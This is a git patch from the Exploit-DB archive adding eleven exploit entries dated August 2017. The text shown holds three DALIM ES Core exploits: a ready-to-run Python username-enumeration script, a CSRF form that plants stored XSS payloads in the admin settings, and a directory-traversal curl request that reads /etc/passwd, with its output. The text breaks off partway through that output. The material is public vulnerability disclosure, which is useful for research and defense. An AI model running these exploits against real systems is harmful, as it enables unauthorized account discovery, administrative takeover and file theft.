From e0d5ee502431ed09fa8691bfd00a0427376d6063 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 11 Aug 2017 05:01:19 +0000
Subject: [PATCH] DB: 2017-08-11

11 new exploits

Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure

WordPress Plugin WatuPRO 5.5.1 - SQL Injection
DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery
WebFile Explorer 1.0 - Arbitrary File Download
ImageBay 1.0 - SQL Injection
GIF Collection 2.0 - SQL Injection
Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting
Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass
---
 files.csv                           |  11 +
 platforms/jsp/webapps/42436.py      | 127 +++++++++++
 platforms/jsp/webapps/42437.html    | 213 ++++++++++++++++++
 platforms/jsp/webapps/42438.txt     | 210 +++++++++++++++++
 platforms/jsp/webapps/42439.txt     | 130 +++++++++++
 platforms/php/webapps/42291.txt     |  59 +++++
 platforms/php/webapps/42440.txt     |  35 +++
 platforms/php/webapps/42441.txt     |  25 +++
 platforms/php/webapps/42442.txt     |  25 +++
 platforms/php/webapps/42443.txt     |  99 ++++++++
 platforms/win_x86-64/dos/42445.html | 336 ++++++++++++++++++++++++++++
 platforms/windows/webapps/42444.txt |  43 ++++
 12 files changed, 1313 insertions(+)
 create mode 100755 platforms/jsp/webapps/42436.py
 create mode 100755 platforms/jsp/webapps/42437.html
 create mode 100755 platforms/jsp/webapps/42438.txt
 create mode 100755 platforms/jsp/webapps/42439.txt
 create mode 100755 platforms/php/webapps/42291.txt
 create mode 100755 platforms/php/webapps/42440.txt
 create mode 100755 platforms/php/webapps/42441.txt
 create mode 100755 platforms/php/webapps/42442.txt
 create mode 100755 platforms/php/webapps/42443.txt
 create mode 100755 platforms/win_x86-64/dos/42445.html
 create mode 100755 platforms/windows/webapps/42444.txt

diff --git a/files.csv b/files.csv
index a3288d0d0..c5f8fb9e0 100644
--- a/files.csv
+++ b/files.csv
@@ -5638,6 +5638,7 @@ id,file,description,date,author,platform,type,port
 42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
 42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
 42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
+42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -38181,6 +38182,7 @@ id,file,description,date,author,platform,type,port
 42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0
 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0
 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0
+42291,platforms/php/webapps/42291.txt,"WordPress Plugin WatuPRO 5.5.1 - SQL Injection",2017-07-03,"Manich  Koomsusi",php,webapps,0
 42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0
 42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0
 42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0
@@ -38236,3 +38238,12 @@ id,file,description,date,author,platform,type,port
 42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
 42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
 42434,platforms/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps,0
+42436,platforms/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,jsp,webapps,0
+42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request",2017-08-09,LiquidWorm,jsp,webapps,0
+42438,platforms/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,jsp,webapps,0
+42439,platforms/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
+42440,platforms/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",php,webapps,0
+42441,platforms/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
+42442,platforms/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
+42443,platforms/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",php,webapps,0
+42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
diff --git a/platforms/jsp/webapps/42436.py b/platforms/jsp/webapps/42436.py
new file mode 100755
index 000000000..f51e7cd4e
--- /dev/null
+++ b/platforms/jsp/webapps/42436.py
@@ -0,0 +1,127 @@
+#!/usr/bin/env python
+#
+#
+# DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness
+#
+#
+# Vendor: Dalim Software GmbH
+# Product web page: https://www.dalim.com
+# Affected version: ES/ESPRiT 5.0 (build 7184.1)
+#                                 (build 7163.2)
+#                                 (build 7163.0)
+#                                 (build 7135.0)
+#                                 (build 7114.1)
+#                                 (build 7114.0)
+#                                 (build 7093.1)
+#                                 (build 7093.0)
+#                                 (build 7072.0)
+#                                 (build 7051.3)
+#                                 (build 7051.1)
+#                                 (build 7030.0)
+#                                 (build 7009.0)
+#                                 (build 6347.0)
+#                                 (build 6326.0)
+#                                 (build 6305.1)
+#                                 (build 6235.9)
+#                                 (build 6172.1)
+#                   ES/ESPRiT 4.5 (build 6326.0)
+#                                 (build 6144.2)
+#                                 (build 5180.2)
+#                                 (build 5096.0)
+#                                 (build 4314.3)
+#                                 (build 4314.0)
+#                                 (build 4146.4)
+#                                 (build 3308.3)
+#                   ES/ESPRiT 4.0 (build 4202.0)
+#                                 (build 4132.1)
+#                                 (build 2235.0)
+#                   ES/ESPRiT 3.0
+#
+# Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
+# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
+# Core is the engine that can handle project tracking, JDF device workflow,
+# dynamic user interface building, volume management. Each ES installation
+# will have different features, depending on the license installed: online
+# approval, prepress workflow, project tracking, imposition management...
+#
+# ES is a collaborative digital asset production and management platform,
+# offering services ranging from online approval to web-based production
+# environment for all participants of the production cycle, including brand
+# owners, agencies, publishers, pre-media, printers and multichannel service
+# provider. ES lets users plan, execute and control any aspect of media
+# production, regardless of the final use of the output (print, web, ebook,
+# movie, and others). It ensures productivity and longterm profitability.
+#
+# Desc: The weakness is caused due to the 'Login.jsp' script enumerating
+# the list of valid usernames when some characters are provided via the
+# 'login' parameter.
+#
+# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
+#            CentOS 7
+#            Apache Tomcat/7.0.78
+#            Apache Tomcat/7.0.67
+#            Apache Tomcat/7.0.42
+#            Apache Tomcat/6.0.35
+#            Apache-Coyote/1.1
+#            Java/1.7.0_80
+#            Java/1.6.0_21
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2017-5425
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
+#
+#
+# 15.06.2017
+#
+
+
+import argparse
+import requests
+import sys
+
+from colorama import Fore, Back, Style, init
+
+init()
+
+print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
+parser = argparse.ArgumentParser()
+parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
+parser.add_argument('-f', help='username wordlist', action='store', dest='file')
+
+args = parser.parse_args()
+if len(sys.argv) != 5:
+	parser.print_help()
+	sys.exit()
+
+host = args.target
+fn = args.file
+
+try:
+	users = open(args.file, 'r')
+except(IOError):
+	print '[!] Error opening \'' +fn+ '\' file.'
+	sys.exit()
+lines = users.read().splitlines()
+print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
+users.close()
+results = open('validusers.txt', 'w')
+
+for line in lines:
+	try:
+		r = requests.post("http://" +host+ "/Esprit/public/Login.jsp", data={'actionRole' : 'getRoles', 'login' : line})
+		print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
+		testingus = r.text[50:72]
+		if testingus[19:20] != "\"":
+			print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
+			results.write('%s\n' % line)
+	except:
+		print '[!] Error connecting to http://'+host
+		sys.exit()
+
+results.close()
+print '\n[*] Enumeration completed!'
+print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'
diff --git a/platforms/jsp/webapps/42437.html b/platforms/jsp/webapps/42437.html
new file mode 100755
index 000000000..20c3a402c
--- /dev/null
+++ b/platforms/jsp/webapps/42437.html
@@ -0,0 +1,213 @@
+<!--
+
+
+DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Stored XSS And CSRF Vulnerabilities
+
+
+Vendor: Dalim Software GmbH
+Product web page: https://www.dalim.com
+Affected version: ES/ESPRiT 5.0 (build 7184.1)
+                                (build 7163.2)
+                                (build 7163.0)
+                                (build 7135.0)
+                                (build 7114.1)
+                                (build 7114.0)
+                                (build 7093.1)
+                                (build 7093.0)
+                                (build 7072.0)
+                                (build 7051.3)
+                                (build 7051.1)
+                                (build 7030.0)
+                                (build 7009.0)
+                                (build 6347.0)
+                                (build 6326.0)
+                                (build 6305.1)
+                                (build 6235.9)
+                                (build 6172.1)
+                  ES/ESPRiT 4.5 (build 6326.0)
+                                (build 6144.2)
+                                (build 5180.2)
+                                (build 5096.0)
+                                (build 4314.3)
+                                (build 4314.0)
+                                (build 4146.4)
+                                (build 3308.3)
+                  ES/ESPRiT 4.0 (build 4202.0)
+                                (build 4132.1)
+                                (build 2235.0)
+                  ES/ESPRiT 3.0
+
+Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
+from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
+Core is the engine that can handle project tracking, JDF device workflow,
+dynamic user interface building, volume management. Each ES installation
+will have different features, depending on the license installed: online
+approval, prepress workflow, project tracking, imposition management...
+
+ES is a collaborative digital asset production and management platform,
+offering services ranging from online approval to web-based production
+environment for all participants of the production cycle, including brand
+owners, agencies, publishers, pre-media, printers and multichannel service
+provider. ES lets users plan, execute and control any aspect of media
+production, regardless of the final use of the output (print, web, ebook,
+movie, and others). It ensures productivity and longterm profitability.
+
+Desc: The application allows users to perform certain actions via HTTP
+requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site. XSS issues
+were also discovered. The issue is triggered when an unauthorized input
+passed via multiple POST and GET parameters are not properly sanitized
+before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
+           CentOS 7
+           Apache Tomcat/7.0.78
+           Apache Tomcat/7.0.67
+           Apache Tomcat/7.0.42
+           Apache Tomcat/6.0.35
+           Apache-Coyote/1.1
+           Java/1.7.0_80
+           Java/1.6.0_21
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5426
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5426.php
+
+
+15.06.2017
+
+-->
+
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://TARGET:8080/dalimws/admin" method="POST">
+      <input type="hidden" name="Prop/DeviceName" value="TESTHOST</script><script>alert(1)</script>" />
+      <input type="hidden" name="Prop_DeviceName_edit" value="TESTHOST" />
+      <input type="hidden" name="Prop/DeviceID" value="WebService-2510717331</script><script>alert(2)</script>" />
+      <input type="hidden" name="Prop_DeviceID_edit" value="WebService-2510717331" />
+      <input type="hidden" name="Prop/QueueCapacity" value="-1</script>script>alert(3)</script>" />
+      <input type="hidden" name="Prop_QueueCapacity_edit" value="-1" />
+      <input type="hidden" name="Prop/AbortOnNothingDone" value="false" />
+      <input type="hidden" name="Prop/IgnoreNodeInfo" value="false" />
+      <input type="hidden" name="Prop/SecurityPassword" value="" />
+      <input type="hidden" name="Prop_SecurityPassword_edit" value="" />
+      <input type="hidden" name="Prop/QueueFolderPath" value="/symlnks/io/jobs/JDFDevice/queue</script><script>alert(4)</script>" />
+      <input type="hidden" name="Prop_QueueFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/queue" />
+      <input type="hidden" name="Prop/PluginFolderPath" value="/symlnks/DALiM_6.0/jdfplugins" />
+      <input type="hidden" name="Prop_PluginFolderPath_edit" value="/symlnks/DALiM_6.0/jdfplugins</script><script>alert(5)</script>" />
+      <input type="hidden" name="Prop/HotFolderPath" value="/symlnks/io/jobs/JDFDevice/hotfolder</script><script>alert(6)</script>" />
+      <input type="hidden" name="Prop_HotFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/hotfolder" />
+      <input type="hidden" name="Prop/DestinationFolderPath" value="/symlnks/io/jobs/JDFDevice/output" />
+      <input type="hidden" name="Prop_DestinationFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/output</script><script>alert(7)</script>" />
+      <input type="hidden" name="Prop/ControllerURL" value="http://TESTHOST:8080/dalimws/controller</script><script>alert(8)</script>" />
+      <input type="hidden" name="Prop_ControllerURL_edit" value="http://TESTHOST:8080/dalimws/controller" />
+      <input type="hidden" name="Prop_DBSettings_edit" value="" />
+      <input type="hidden" name="Prop/DBSettings" value="" />
+      <input type="hidden" name="Prop/JDBC_Driver" value="org.hsqldb.jdbcDriver</script><script>alert(9)</script>" />
+      <input type="hidden" name="Prop_JDBC_Driver_edit" value="org.hsqldb.jdbcDriver" />
+      <input type="hidden" name="Prop/JDBC_URL" value="jdbc:hsqldb:/symlnks/io/jobs/JDFDevice/queue/QueueDB" />
+      <input type="hidden" name="Prop_JDBC_URL_edit" value="jdbc:hsqldb:/symlnks/io/jobs/JDFDevice/queue/QueueDB" />
+      <input type="hidden" name="Prop/JDBC_User" value="SA" />
+      <input type="hidden" name="Prop_JDBC_User_edit" value="SA" />
+      <input type="hidden" name="Prop/JDBC_Password" value="null" />
+      <input type="hidden" name="Prop_JDBC_Password_edit" value="null" />
+      <input type="hidden" name="Prop_LogLevel_edit" value="Information" />
+      <input type="hidden" name="Prop/LogLevel" value="INFO" />
+      <input type="hidden" name="Prop_LogFiles_edit" value="stdout.log" />
+      <input type="hidden" name="Prop/LogFiles" value="stdout.log" />
+      <input type="hidden" name="Prop/LogContent" value="" />
+      <input type="hidden" name="Prop_LogContent_edit" value="" />
+      <input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/CacheSize" value="1000" />
+      <input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_CacheSize_edit" value="1000" />
+      <input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/CacheFolder" value="/symlnks/io/jobs/dialogue/cache" />
+      <input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_CacheFolder_edit" value="/symlnks/io/jobs/dialogue/cache" />
+      <input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_TextExtractionVersion_edit" value="2" />
+      <input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/TextExtractionVersion" value="2" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/TwistGate" value="TWIST7-1" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_twist_TwistPlugin_TwistGate_edit" value="TWIST7-1" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/GatePort" value="6042" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_twist_TwistPlugin_GatePort_edit" value="6042" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/DirectFileIO" value="false" />
+      <input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/fontRegistrationURL" value="" />
+      <input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_fontRegistrationURL_edit" value="" />
+      <input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/jdfProviderURL" value="" />
+      <input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_jdfProviderURL_edit" value="" />
+      <input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/layoutFolder" value="false" />
+      <input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_layoutFolder_edit" value="false" />
+      <input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/markFolder" value="" />
+      <input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_markFolder_edit" value="" />
+      <input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/markTmp" value="" />
+      <input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_markTmp_edit" value="" />
+      <input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Server" value="127.0.0.1" />
+      <input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Server_edit" value="127.0.0.1" />
+      <input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5ServerPort" value="8000" />
+      <input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5ServerPort_edit" value="8000" />
+      <input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5User" value="super" />
+      <input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5User_edit" value="super" />
+      <input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Password" value="super" />
+      <input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Password_edit" value="super" />
+      <input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Client" value="" />
+      <input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Client_edit" value="" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/HotfolderLogging" value="false" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpPort" value="" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpPort_edit" value="" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpDataRoot" value="/symlnks/io/jobs/ftpd/data" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpDataRoot_edit" value="/symlnks/io/jobs/ftpd/data" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpwatcherRoot" value="/symlnks/io/jobs/ftpwatcher" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpwatcherRoot_edit" value="/symlnks/io/jobs/ftpwatcher" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpwatcherLogging" value="false" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/MailwatcherRoot" value="/symlnks/io/jobs/mailwatcher" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_MailwatcherRoot_edit" value="/symlnks/io/jobs/mailwatcher" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FilemonitorRoot" value="" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FilemonitorRoot_edit" value="" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FilemonitorBatchCount" value="1" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FilemonitorBatchCount_edit" value="1" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_MetadataType_edit" value="DETAILED" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/MetadataType" value="DETAILED" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_DatabaseType_edit" value="hsqldb" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/DatabaseType" value="hsqldb" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/csconv/ColorSpaceConversionPlugin/BaseFolder" value="" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_csconv_ColorSpaceConversionPlugin_BaseFolder_edit" value="" />
+      <input type="hidden" name="com/dalim/jdf/process/plugin/csconv/ColorSpaceConversionPlugin/CheckInterval" value="-1" />
+      <input type="hidden" name="com_dalim_jdf_process_plugin_csconv_ColorSpaceConversionPlugin_CheckInterval_edit" value="-1" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogfileMaxSize" value="100M" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogfileMaxSize_edit" value="100M" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogfileMaxCount" value="10" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogfileMaxCount_edit" value="10" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogAddHD" value="false" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogIntoTomcatLog" value="false" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LoggingLevel_edit" value="INFO" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LoggingLevel" value="INFO" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/ExtraServerLogging" value="false" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/ServerPort" value="6019" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_ServerPort_edit" value="6019" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_PublishWorkflows_edit" value="on" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/PublishWorkflows" value="true" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_RetLogLocation_edit" value="JDFResult" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/RetLogLocation" value="JDFResult" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogAlways_edit" value="on" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogAlways" value="true" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/MaxProcessCount" value="16" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_MaxProcessCount_edit" value="16" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/MaxRunningProcessCount" value="16" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_MaxRunningProcessCount_edit" value="16" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/HardworkerCount" value="2" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_HardworkerCount_edit" value="2" />
+      <input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/RepositoryUrl" value="http://localhost:8080/EspritEngine/JMFProcessor.html/servlet/etwistrepository" />
+      <input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_RepositoryUrl_edit" value="http://localhost:8080/EspritEngine/JMFProcessor.html/servlet/etwistrepository" />
+      <input type="hidden" name="Prop/queueIsRunning" value="false" />
+      <input type="hidden" name="Prop/action" value="return" />
+      <input type="hidden" name="XUI_SessionID" value="admin976" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/jsp/webapps/42438.txt b/platforms/jsp/webapps/42438.txt
new file mode 100755
index 000000000..23c05d963
--- /dev/null
+++ b/platforms/jsp/webapps/42438.txt
@@ -0,0 +1,210 @@
+DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Remote File Disclosures
+
+
+Vendor: Dalim Software GmbH
+Product web page: https://www.dalim.com
+Affected version: ES/ESPRiT 5.0 (build 7184.1)
+                                (build 7163.2)
+                                (build 7163.0)
+                                (build 7135.0)
+                                (build 7114.1)
+                                (build 7114.0)
+                                (build 7093.1)
+                                (build 7093.0)
+                                (build 7072.0)
+                                (build 7051.3)
+                                (build 7051.1)
+                                (build 7030.0)
+                                (build 7009.0)
+                                (build 6347.0)
+                                (build 6326.0)
+                                (build 6305.1)
+                                (build 6235.9)
+                                (build 6172.1)
+                  ES/ESPRiT 4.5 (build 6326.0)
+                                (build 6144.2)
+                                (build 5180.2)
+                                (build 5096.0)
+                                (build 4314.3)
+                                (build 4314.0)
+                                (build 4146.4)
+                                (build 3308.3)
+                  ES/ESPRiT 4.0 (build 4202.0)
+                                (build 4132.1)
+                                (build 2235.0)
+                  ES/ESPRiT 3.0
+
+Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
+from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
+Core is the engine that can handle project tracking, JDF device workflow,
+dynamic user interface building, volume management. Each ES installation
+will have different features, depending on the license installed: online
+approval, prepress workflow, project tracking, imposition management...
+
+ES is a collaborative digital asset production and management platform,
+offering services ranging from online approval to web-based production
+environment for all participants of the production cycle, including brand
+owners, agencies, publishers, pre-media, printers and multichannel service
+provider. ES lets users plan, execute and control any aspect of media
+production, regardless of the final use of the output (print, web, ebook,
+movie, and others). It ensures productivity and longterm profitability.
+
+Desc: Input passed thru several parameters is not properly verified before
+being used to read files. This can be exploited by an unauthenticated 
+attacker to read arbitrary files from local resources with directory
+traversal attacks.
+
+Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
+           CentOS 7
+           Apache Tomcat/7.0.78
+           Apache Tomcat/7.0.67
+           Apache Tomcat/7.0.42
+           Apache Tomcat/6.0.35
+           Apache-Coyote/1.1
+           Java/1.7.0_80
+           Java/1.6.0_21
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5427
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5427.php
+
+
+15.06.2017
+
+--
+
+
+---------------------------------------------------
+1. PoC request for Password.jsp, orgName parameter:
+---------------------------------------------------
+
+~ curl -v http://TARGET:8080/Esprit/public/Password.jsp\?orgName\=../../../../../../../../../etc/passwd
+*   Trying TARGET...
+* TCP_NODELAY set
+* Connected to TARGET (TARGET) port 8080 (#0)
+> GET /Esprit/public/Password.jsp?orgName=../../../../../../../../../etc/passwd HTTP/1.1
+> Host: TARGET:8080
+> User-Agent: curl/7.51.0
+> Accept: */*
+> 
+< HTTP/1.1 200 OK
+< Content-Type: text/html;charset=UTF-8
+< Transfer-Encoding: chunked
+< Date: Thu, 15 Jun 2017 02:18:44 GMT
+< Server: Server
+< 
+
+--snip--
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
